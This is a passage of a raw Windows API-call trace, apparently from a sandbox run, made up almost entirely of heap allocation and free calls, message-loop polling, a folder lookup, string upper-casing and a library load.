[0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0219.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0219.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0219.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0219.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0219.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0219.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0219.211] TranslateMessage (lpMsg=0x8cf708) returned 0 [0219.211] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0219.211] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0219.211] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.211] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0219.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0219.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.213] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Videos", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0x9e1bf8 [0219.213] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0219.213] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0219.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0219.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.215] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.215] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0219.215] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.215] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.215] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0219.215] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.216] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0219.216] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.216] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.217] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0219.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0219.217] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.217] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.217] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0219.217] CharUpperBuffW (in: 